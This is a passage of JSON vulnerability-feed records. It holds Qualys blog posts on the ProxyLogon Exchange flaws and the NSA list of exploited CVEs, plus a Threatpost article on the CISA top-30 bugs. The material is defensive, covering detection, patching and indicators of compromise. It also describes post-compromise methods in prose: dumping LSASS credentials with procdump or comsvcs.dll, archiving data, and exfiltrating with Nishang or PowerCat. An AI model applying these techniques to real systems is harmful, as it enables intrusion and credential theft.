"QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-11T20:27:44", "description": "**Update March 10, 2021**: A new section describes how to respond with mitigation controls if patches cannot be applied, as recommended by Microsoft. This section details the Qualys Policy Compliance control ids for each vulnerability.\n\n**Update March 8, 2021**: Qualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. QID 50108 is available in VULNSIGS-2.5.125-3 version and above, and is available across all platforms as of March 8th, 1:38 AM ET. This QID is not applicable to agents, so the signature version for the agent will not be updated. QID: 50107, released in VULNSIGS-2.5.121-4 and Windows Cloud Agent manifest 2.5.121.4-3 and above, will accurately detect this vulnerability via agents.\n\n**Original Post**: On March 2nd, [Microsoft released](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) a set of out-of-band security updates to address critical remote code execution vulnerabilities in Microsoft Exchange Server. According to Microsoft these vulnerabilities are actively being exploited in the wild, and hence it is recommended to patch them immediately.\n\nTo detect vulnerable instances, Qualys released QID 50107 which detects all vulnerable instances of Exchange server. This QID is included in VULNSIGS-2.5.121-4 version and above.\n\nCVEs addressed as part of this QID are: CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\nAmong the above CVEs, [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) are being actively targeted in the wild using zero-day exploits. Microsoft attributes these attacks with high confidence to the HAFNIUM (Chinese cyber spy) threat actor group. These vulnerabilities are related to the following versions of Exchange Server:\n\n * Exchange Server 2013\n * Exchange Server 2016\n * Exchange Server 2019\n\nAt the time of the security update release the vulnerabilities affect only on-premises Microsoft Exchange Server installations. Exchange online is not affected.\n\n### CVE Technical Details\n\n**[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)** is a Server-Side Request Forgery (SSRF) vulnerability that allows attackers to send arbitrary HTTP requests and authenticate to on-premises Exchange servers. Attackers can also trick the Exchange server to execute arbitrary commands by exploiting this vulnerability.\n\n**[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Attackers who successfully exploit this vulnerability can run their code as SYSTEM on the Exchange server. \n\n**[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>)** is a post-authentication arbitrary file write vulnerability in Exchange. Exploiting this vulnerability could allow an attacker to write a file to any part of the target Exchange server. Attackers exploiting this vulnerability could write a file to any path on the target Exchange server.\n\n**[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>)** is a post-authentication arbitrary file write vulnerability in Exchange. Similar to CVE-2021-26858, exploiting this vulnerability could allow an attacker to write a file to any path of the target Exchange server.\n\n### Attack Chain\n\nMicrosoft has provided details regarding how the HAFNIUM (threat actor) group is exploiting the above-mentioned critical CVEs. Following sequence of steps summarizes Microsoft\u2019s findings.\n\n 1. The initial step in the attack chain includes the threat actor group making an untrusted connection to the target Exchange server (on port 443) using CVE-2021-26855.\n 2. After successfully establishing the connection, the threat actor group exploits CVE-2021-26857 that gives them ability to run code as SYSTEM on the target Exchange server. This requires administrator permission or another vulnerability to exploit.\n 3. As part of their post-authentication actions, the threat actor group exploits [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) and proceeds to writing files to any path of the target server.\n\nIt has been observed that after gaining the initial access, the threat actor group deployed web shells on the target compromised server.\n\nFollowing table shows the MITRE ATT&CK Technique and Tactic details.\n\n**Tactic**| **Technique**| **Sub-Technique**| **TID** \n---|---|---|--- \nReconnaissance| Gather Victim Identity Information| Email Addresses| T1589.002 \nReconnaissance| Gather Victim Identity Information| IP Addresses| T1589.005 \nResource Development| Develop Capabilities| Exploits| T1587.004 \nInitial Access| Exploit Public-Facing Application| -| T1190 \nExecution| Command and scripting interpreter| PowerShell| T1059.001 \nPersistence| Create Account| Domain Account| T1136.002 \nPersistence| Server Software Component| Web Shell| T1505.003 \nCredential Access| OS Credential Dumping| LSASS Memory| T1003.001 \nCredential Access| OS Credential Dumping| NTDS| T1003.003 \nLateral Movement| Remote Services| SMB/Windows Admin Shares| T1201.002 \nCollection| Archive Collected Data| Archive via Utility| T1560.001 \nCollection| Email Collection| Remote Email Collection| T1114.002 \nCollection| Email Collection| Local Email Collection| T114.001 \nCommand and Control| Remote Access Software| -| T1219 \nExfiltration| Exfiltration over Web Service| Exfiltration to Cloud Storage| T1567.002 \n \n### Discover and Remediate the Zero-Day Vulnerabilities Using Qualys VMDR\n\n##### Identify Microsoft Exchange Server Assets\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of assets. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify Windows Exchange server systems.\n\nQuery: _operatingSystem.category:Server and operatingSystem.category1:`Windows` and software:(name:Microsoft Exchange Server)_\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cExchange Server 0-day\u201d. This helps in automatically grouping existing hosts with the 0-days as well as any new Windows Exchange server that spins up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n##### Discover Exchange Server Zero-Day Vulnerabilities\n\nNow that hosts running Microsoft Exchange Server are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like these based on the always updated KnowledgeBase (KB).\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018Exchange Server 0-day\u2019 asset tag in the vulnerabilities view by using this QQL query:\n\nVMDR query: `vulnerabilities.vulnerability.qid:50107`\n\n\n\nQID 50107 is available in signature version VULNSIGS-2.5.121-4 and above and can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version 2.5.121.4-3 and above.\n\nQualys has released an additional QID: 50108 which remotely detects instances of Exchange Server vulnerable to ProxyLogon vulnerability CVE-2021-26855 without authentication. This QID is not applicable to agents. QID 50108 is available in VULNSIGS-2.5.125-3 version and above.\n\nOrganizations that use on-premises Exchange installations typically also enable Outlook Web Access (OWA), which is exposed to the internet to allow users to connect into their e-mail systems. It is therefore recommended organizations employ both remote and authenticated scanning methods to get the most accurate view of vulnerable assets, as using only the agent-based approach would not provide a comprehensive picture of the vulnerability exposure.\n\nWith VMDR Dashboard, you can track 'Exchange 0-day', impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment using the Exchange Server 0-Day Dashboard.\n\n**Dashboard**: [Exchange Server 0-Day Dashboard | Critical Global View](<https://qualys-secure.force.com/customer/s/article/000006564>)\n\n\n\n##### Respond by Patching\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201cqid: 50107\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 Exchange Server 0-day.\n\n\n\nSecurity updates are available for the following specific versions of Exchange:\n\n * [Update for Exchange Server 2019](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires Cumulative Update (CU) 8 or CU 7\n * [Update for Exchange Server 2016](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 19 or CU 18\n * [Update for Exchange Server 2013](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-march-2-2021-kb5000871-9800a6bb-0a21-4ee7-b9da-fa85b3e1d23b>): Requires CU 23\n * [Update for Exchange Server 2010](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2010-service-pack-3-march-2-2021-kb5000978-894f27bf-281e-44f8-b9ba-dad705534459>): Requires SP 3 or any SP 3 RU\n * This is a defense-in-depth update.\n\nUsers are encouraged to apply patches as soon as possible.\n\n##### Respond with Mitigation Controls if Patches Cannot Be Applied\n\nWe recognize not all organizations may be able patch their systems right away. In such scenarios Microsoft has recommended a few [interim mitigation controls](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) to limit the exploitation of these vulnerabilities. [Qualys Policy Compliance](<https://www.qualys.com/apps/policy-compliance/>) has added controls based on these recommendations for impacted Exchange Servers 2013, 2016, and 2019. The vulnerability details and corresponding Control IDs (CIDs) are provided below.\n\n**CVE-2021-26855**: This mitigation will filter https requests that contain malicious X-AnonResource-Backend and malformed X-BEResource cookies which were found to be used in the SSRF attacks in the wild. This will help with defense against the known patterns observed but not the SSRF as a whole.\n\n * **CID 20831** - Status of match URL of rewrite rule 'X-BEResource Abort - inbound' for which action is 'AbortRequest at site level\n * **CID 20834** - Status of match URL of rewrite rule 'X-AnonResource-Backend Abort - inbound' for which action is 'AbortRequest at site level\n\n**CVE-2021-26857**: Disabling the UM Service will mitigate this vulnerability.\n\n * **CID 20829** - Status of 'component' installed on the MS Exchange server\n * **CID 20828** - Status of Microsoft Exchange Unified Messaging Call Router service\n * **CID 20827** - Status of Microsoft Exchange Unified Messaging service\n\n**CVE-2021-27065**: Disabling OAB Application Pool will prevent this CVE from executing successfully as the API will no longer respond and return a 503 when calling OAB, which will mitigate the Arbitrary Write exploit that occurs with OAB. After stopping the WebApp Pool you will also need to set the OabProxy Server Component state to Inactive.\n\n * **CID 20832** - Check the 'startMode' of the OAB Application Pool (MSExchangeOABAppPool)\n\n**CVE-2021-26858**: Disabling ECP Virtual Directory will prevent CVE-2021-27065 from executing successfully as the API will no longer respond and return a 503 when calling the Exchange Control Panel (ECP).\n\n * **CID 20833** - Check the 'startMode' of the ECP Application Pool (MSExchangeECPAppPool)\n\nQualys Policy Compliance can be used to easily monitor these mitigating controls for impacted Exchange assets.\n\n\n\nDrill down into failing controls to view details and identify issues.\n\n\n\n### Post-Compromise Detection Details\n\nAfter compromising a system, an adversary can perform the following activity:\n\nUse legitimate utilities such as procdump or the rundll32 comsvcs.dll method to dump the LSASS process memory. Presumably, this follows exploitation via CVE-2021-26857 as these methods do need administrative privileges.\n\n\n\nUse 7-Zip or WinRar to compress files for exfiltration.\n\n\n\nUse PowerShell based remote administration tools such as Nishang & PowerCat to exfiltrate this data.\n\n\n\nTo maintain persistent access on compromised systems, adversaries may also create a domain user account and install ASPX- and PHP-based web shells for command and control. Information about their probable location and their related hashes are mentioned below.\n\n**Web shell hashes**:\n \n \n b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n**Web shell paths**:\n\n`C:\\inetpub\\wwwroot\\aspnet_client\\ \nC:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \n%PROGRAMFILES%\\Microsoft\\Exchange Server\\V14\\FrontEnd\\HttpProxy\\owa\\auth\\ \nC:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\`\n\n### References\n\n * https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901\n * https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss3": {}, "published": "2021-03-03T22:12:19", "type": "qualysblog", "title": "Microsoft Exchange Server Zero-Days (ProxyLogon) \u2013 Automatically Discover, Prioritize and Remediate Using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T22:12:19", "id": "QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research ([PDF](<https://l.vulcancyber.com/hubfs/Infographics/Pulse%20research%20project%20-%202021-07-23%20-%20How%20are%20Businesses%20Mitigating%20Cyber%20Risk.pdf>)) from Vulcan Cyber has found that more than three-quarters of cybersecurity leaders have been impacted by a security vulnerability over the past year. It begs the question: Is there a mismatch between enterprise vulnerability management programs and the ability of security teams to mitigate risk?\n\nYaniv Bar-Dayan, CEO and co-founder at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, suggested that it\u2019s become ever more vital for enterprise IT security stakeholders to make \u201cmeaningful changes to their cyber hygiene efforts.\u201d That means \u201cprioritizing risk-based cybersecurity efforts, increasing collaboration between security and IT teams, updating vulnerability management tooling, and enhancing enterprise risk analytics, especially in businesses with advanced cloud application programs.\u201d\n\nGranted, vulnerability management is \u201cone of the most difficult aspects of any security program,\u201d he continued. But if a given vulnerability is being exploited, that should kick it up the priority list, Var-Dayan said. \u201cTaking a risk-based approach to vulnerability management is the way forward; and teams should unquestionably be prioritizing vulnerabilities that are actively being exploited.\u201d\n\n072921 15:02 UPDATE: Corrected misattribution of quotes.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T18:39:56", "type": "threatpost", "title": "CISA\u2019s Top 30 Bugs: One\u2019s Old Enough to Buy Beer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 